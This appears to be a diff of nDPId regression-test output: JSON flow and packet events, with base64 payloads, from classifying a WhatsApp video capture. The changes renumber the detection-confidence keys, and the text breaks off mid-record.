00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455770313,"flow_last_seen":1561455770313,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455770313,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":51277,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1561455770313,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1561455770313,"pkt":"AQBef\/\/6kLkxKPrKCABFAAClcA8AAAIRlYrAqAIM7\/\/\/+shNB2wAkeqFTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 
-00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455770313,"flow_last_seen":1561455770313,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455770313,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":51277,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455770313,"flow_last_seen":1561455770313,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455770313,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":51277,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":51,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1561455767339,"flow_last_seen":1561455770332,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6901,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1561455770332,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1561455767339,"flow_last_seen":1561455770332,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6901,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1561455770332,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455772049,"flow_last_seen":1561455772049,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1561455772049,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1561455772049,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1561455772049,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFInqwAAP8RG\/kAAAAA\/\/\/\/\/wBEAEMBNNtQAQEGAH5K8tcAMwAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"} -00734{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455772049,"flow_last_seen":1561455772049,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1561455772049,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,121,3,6,15,119,252,95,44,46","class_ident":""}} 
+00734{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455772049,"flow_last_seen":1561455772049,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1561455772049,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,121,3,6,15,119,252,95,44,46","class_ident":""}} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1561455773318,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1561455773318,"pkt":"AQBef\/\/6kLkxKPrKCABFAACgzaAAAAIRN\/7AqAIM7\/\/\/+shNB2wAjBq9TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpzZXJ2aWNlOldBTklQQ29ubmVjdGlvbjoxDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KTVg6IDMNCg0K"} 00622{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1561455776326,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1561455776326,"pkt":"AQBef\/\/6kLkxKPrKCABFAAChemIAAAIRizvAqAIM7\/\/\/+shNB2wAjbrDTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpzZXJ2aWNlOldBTlBQUENvbm5lY3Rpb246MQ0KTUFOOiAic3NkcDpkaXNjb3ZlciINCk1YOiAzDQoNCg=="} 
00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1561455780246,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1561455780246,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFInq0AAP8RG\/gAAAAA\/\/\/\/\/wBEAEMBNNtIAQEGAH5K8tcAOwAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":371,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455781247,"flow_last_seen":1561455781247,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455781247,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"1.60.78.64","src_port":53688,"dst_port":59491,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1561455781247,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455781247,"pkt":"xiwDYGpkkLkxKPrKCABFAABIyagAAEARnszAqAIMATxOQNG46GMANIouAAEAGCESpELJdbow6qY0UK1Q3DAACAAUjCUqyJwTIDkKR+sjy0Uf5fkPaoE="} 
-00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":371,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455781247,"flow_last_seen":1561455781247,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455781247,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"1.60.78.64","src_port":53688,"dst_port":59491,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":371,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455781247,"flow_last_seen":1561455781247,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455781247,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"1.60.78.64","src_port":53688,"dst_port":59491,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":381,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455781352,"flow_last_seen":1561455781352,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455781352,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"91.252.56.51","src_port":53688,"dst_port":32641,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1561455781352,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455781352,"pkt":"xiwDYGpkkLkxKPrKCABFAABIUPMAAEAR0s7AqAIMW\/w4M9G4f4EANAIPAAEAGCESpEIZqLFMH0mnKh34iiEACAAUNcgqBRg9v\/os\/sidMBIfN2R1dO0="} -00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":381,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455781352,"flow_last_seen":1561455781352,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455781352,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"91.252.56.51","src_port":53688,"dst_port":32641,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":381,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455781352,"flow_last_seen":1561455781352,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455781352,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"91.252.56.51","src_port":53688,"dst_port":32641,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1561455781879,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455781879,"pkt":"xiwDYGpkkLkxKPrKCABFAABIUTkAAEARFzzAqAIMATxOQNG46GMANHzbAAEAGCESpELHuuAP05RaI+J6URIACAAUsHZdEyJr5uObsKQa7DYbE4YCA9M="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1561455782059,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455782059,"pkt":"xiwDYGpkkLkxKPrKCABFAABI8PwAAEARMsXAqAIMW\/w4M9G4f4EANE0kAAEAGCESpEKAWzwjt5VRcfVmBmsACAAUJw9zjdQvQsjy5FQih0Itb6wHKg0="} 
00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1561455782574,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455782574,"pkt":"xiwDYGpkkLkxKPrKCABFAABIwHEAAEARqAPAqAIMATxOQNG46GMANGXPAAEAGCESpEIoM9pd\/2PDbhKoL1oACAAUvqQBu1i76V7zg0ib1\/6QLghtUUY="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1561455782679,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455782679,"pkt":"xiwDYGpkkLkxKPrKCABFAABINRkAAEAR7qjAqAIMW\/w4M9G4f4EANKRJAAEAGCESpEL4j9YAEpPJGTu3VCAACAAUGXORRrB48FGvPcJutSVccHGlcxM="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1470,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455791449,"flow_last_seen":1561455791449,"flow_idle_time":200000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1561455791449,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00904{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1470,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1561455791449,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":383,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":383,"pkt_l4_len":349,"thread_ts_msec":1561455791449,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAFxMkoAAEARwOHAqAIBwKgC\/0RcRFwBXbU+eyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAxNzQ1NjcxOTM5MjIwMTQ2OTg4Njg4NzAzNTEyMjAyNTg3OTI0NDMsICJkaXNwbGF5bmFtZSI6ICIiLCAibmFtZXNwYWNlcyI6IFsyNzUwMzcwNTYwLCA3ODUyNjYxNzcsIDE1MjYyNjMwNDUsIDEzMzg2NTkyMDEsIDE0ODE5MzM3LCA0ODA5NDIwMDQ4LCA1MTE3MDY2NDIsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA0ODEwNTkxNzYwLCA1ODM0NDk5NiwgOTk2MzA2MjE1LCA1MzAzMzAxMjQ4LCAzMDc1NTIxNjk2LCA0MDU2NDYyNTkyLCAyOTYzNjgyMDk2LCAxNTIyMTc3NTg3XX0="} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1470,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455791449,"flow_last_seen":1561455791449,"flow_idle_time":200000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1561455791449,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1470,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455791449,"flow_last_seen":1561455791449,"flow_idle_time":200000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1561455791449,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1471,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1561455791449,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"thread_ts_msec":1561455791449,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAFvmCUAAEARWwjAqAIBwKgC\/0RcRFwBW7HJeyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAxNzQ1NjcxOTM5MjIwMTQ2OTg4Njg4NzAzNTEyMjAyNTg3OTI0NDMsICJkaXNwbGF5bmFtZSI6ICIiLCAibmFtZXNwYWNlcyI6IFsxMTgyMzk1NTczLCAxNDIxMTE0Mzk5LCAxODA4MDQ3NjgwLCAxMzcyMDkyNjA5LCAxMjUyMTE2NDI5LCA5OTQ2OTc3MywgNTI1ODAwNzEyMCwgMTc2OTY0MzA3LCAxMjU1NDA1NjYsIDEwNDc0MjgxODksIDQ3MTYxOTAwNDgsIDU0NjcxNjMwODgsIDExOTUwNDQwNzEsIDk2ODUzMjI0LCAxNzYwOTk2MywgNDUxNDcyNjU4LCA0MTc0NjUwODgwLCAyODUyMTYwNywgMTQxNTYyMDM1MF19"} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1537,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455792270,"flow_last_seen":1561455792270,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455792270,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":65025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1537,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1561455792270,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1561455792270,"pkt":"AQBef\/\/6kLkxKPrKCABFAAClb\/UAAAIRlaTAqAIM7\/\/\/+v4BB2wAkbTRTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1537,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455792270,"flow_last_seen":1561455792270,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455792270,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":65025,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1537,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455792270,"flow_last_seen":1561455792270,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455792270,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":65025,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1543,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455792273,"flow_last_seen":1561455792273,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455792273,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":51458,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00630{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1543,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1561455792273,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1561455792273,"pkt":"AQBef\/\/6kLkxKPrKCABFAACleZoAAAIRi\/\/AqAIM7\/\/\/+skCB2wAkenQTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 
-00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1543,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455792273,"flow_last_seen":1561455792273,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455792273,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":51458,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1543,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455792273,"flow_last_seen":1561455792273,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455792273,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":51458,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": 